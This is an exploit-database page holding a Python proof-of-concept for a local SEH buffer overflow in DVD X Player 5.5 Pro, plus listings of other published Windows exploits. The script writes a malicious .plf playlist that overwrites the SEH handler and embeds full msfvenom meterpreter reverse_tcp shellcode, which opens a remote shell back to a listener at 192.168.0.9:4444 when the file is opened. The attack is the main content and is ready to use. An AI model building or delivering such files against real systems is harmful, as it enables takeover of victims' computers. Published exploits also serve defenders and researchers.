Menu

"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)"

Author

"Kevin Randall"

Platform

windows

Release date

2019-06-04

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
# Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH
# Date: 6-3-2019
# Exploit Author: Kevin Randall
# Vendor Homepage: http://www.dvd-x-player.com/download.html#dvdPlayer
# Software Link: http://www.dvd-x-player.com/download.html#dvdPlayer
# Version: 5.5 Pro
# Tested on: Windows 7
# CVE : N/A

#!/usr/bin/python
###########Create Shellcode with MSFVenom###############################################################################################
##msfvenom shellcode generate: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=4444 -b '\x00\x0A\x0D\x1A' -f python
########################################################################################################################################
file_name = "payloadofficial.plf"

#######################Copy and Paste Shellcode Here!!###########################
buf =  ""
buf += "\xd9\xe8\xb8\xa0\x7e\x18\xef\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x56\x31\x47\x18\x83\xef\xfc\x03\x47\xb4\x9c"
buf += "\xed\x13\x5c\xe2\x0e\xec\x9c\x83\x87\x09\xad\x83\xfc"
buf += "\x5a\x9d\x33\x76\x0e\x11\xbf\xda\xbb\xa2\xcd\xf2\xcc"
buf += "\x03\x7b\x25\xe2\x94\xd0\x15\x65\x16\x2b\x4a\x45\x27"
buf += "\xe4\x9f\x84\x60\x19\x6d\xd4\x39\x55\xc0\xc9\x4e\x23"
buf += "\xd9\x62\x1c\xa5\x59\x96\xd4\xc4\x48\x09\x6f\x9f\x4a"
buf += "\xab\xbc\xab\xc2\xb3\xa1\x96\x9d\x48\x11\x6c\x1c\x99"
buf += "\x68\x8d\xb3\xe4\x45\x7c\xcd\x21\x61\x9f\xb8\x5b\x92"
buf += "\x22\xbb\x9f\xe9\xf8\x4e\x04\x49\x8a\xe9\xe0\x68\x5f"
buf += "\x6f\x62\x66\x14\xfb\x2c\x6a\xab\x28\x47\x96\x20\xcf"
buf += "\x88\x1f\x72\xf4\x0c\x44\x20\x95\x15\x20\x87\xaa\x46"
buf += "\x8b\x78\x0f\x0c\x21\x6c\x22\x4f\x2d\x41\x0f\x70\xad"
buf += "\xcd\x18\x03\x9f\x52\xb3\x8b\x93\x1b\x1d\x4b\xa2\x0c"
buf += "\x9e\x83\x0c\x5c\x60\x24\x6c\x74\xa7\x70\x3c\xee\x0e"
buf += "\xf9\xd7\xee\xaf\x2c\x4d\xe5\x27\x0f\x39\xf9\xbe\xe7"
buf += "\x3b\xfa\xd1\xab\xb2\x1c\x81\x03\x94\xb0\x62\xf4\x54"
buf += "\x61\x0b\x1e\x5b\x5e\x2b\x21\xb6\xf7\xc6\xce\x6e\xaf"
buf += "\x7e\x76\x2b\x3b\x1e\x77\xe6\x41\x20\xf3\x02\xb5\xef"
buf += "\xf4\x67\xa5\x18\x63\x87\x35\xd9\x06\x87\x5f\xdd\x80"
buf += "\xd0\xf7\xdf\xf5\x16\x58\x1f\xd0\x25\x9f\xdf\xa5\x1f"
buf += "\xeb\xd6\x33\x1f\x83\x16\xd4\x9f\x53\x41\xbe\x9f\x3b"
buf += "\x35\x9a\xcc\x5e\x3a\x37\x61\xf3\xaf\xb8\xd3\xa7\x78"
buf += "\xd1\xd9\x9e\x4f\x7e\x22\xf5\xd3\x79\xdc\x8b\xfb\x21"
buf += "\xb4\x73\xbc\xd1\x44\x1e\x3c\x82\x2c\xd5\x13\x2d\x9c"
buf += "\x16\xbe\x66\xb4\x9d\x2f\xc4\x25\xa1\x65\x88\xfb\xa2"
buf += "\x8a\x11\x0c\xd8\xe3\xa6\xed\x1d\xea\xc2\xee\x1d\x12"
buf += "\xf5\xd3\xcb\x2b\x83\x12\xc8\x0f\x9c\x21\x6d\x39\x37"
buf += "\x49\x21\x39\x12"
#################################################################################

#No Operations#
nops = "\x90"*20
shellcode = nops + buf

####Where all the magic happens! :)#####################################################################
buffer = "A"* 608 + "\xEB\x06\x90\x90" + "\x2E\x17\x64\x61" + shellcode + "D"*(1384-len(shellcode))
###################################################################################################
plf_file = open(file_name,"w")
plf_file.write(buffer)
plf_file.close()
Release Date Title Type Platform Author
2019-08-15 "Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities" local windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Out-of-Bounds read due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in FixSbitSubTableFormat1" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in WriteTableFromStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadAllocFormat12CharGlyphMapList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadTableIntoStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in FixSbitSubTables" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Double Free in MergeFormat12Cmap / MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in GetGlyphIdx" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Returning a Dangling Pointer via MergeFontPackage" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators" dos windows "Google Security Research"
2019-08-14 "ManageEngine opManager 12.3.150 - Authenticated Code Execution" webapps windows kindredsec
2019-08-14 "TortoiseSVN 1.12.1 - Remote Code Execution" webapps windows Vulnerability-Lab
2019-08-14 "Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion" local windows "Abdelhamid Naceri"
2019-08-12 "Steam Windows Client - Local Privilege Escalation" local windows AbsoZed
2019-08-14 "Windows PowerShell - Unsanitized Filename Command Execution" dos windows hyp3rlinx
2019-08-05 "Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)" remote windows Metasploit
2019-07-26 "Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation" local windows ShivamTrivedi
2019-07-18 "Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation" local windows "Google Security Research"
Release Date Title Type Platform Author
2019-06-04 "DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)" local windows "Kevin Randall"
2019-04-30 "Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow" remote windows "Kevin Randall"
2019-04-30 "Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow" remote windows "Kevin Randall"
2019-03-26 "Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion" webapps windows "Kevin Randall"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal" dos windows "Kevin Randall"
2018-08-30 "DLink DIR-601 - Credential Disclosure" webapps hardware "Kevin Randall"
2018-04-02 "DLink DIR-601 - Admin Password Disclosure" webapps hardware "Kevin Randall"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46962/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46962/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46962/41371/dvd-x-player-55-pro-local-buffer-overflow-seh/download/", "exploit_id": "46962", "exploit_description": "\"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)\"", "exploit_date": "2019-06-04", "exploit_author": "\"Kevin Randall\"", "exploit_type": "local", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse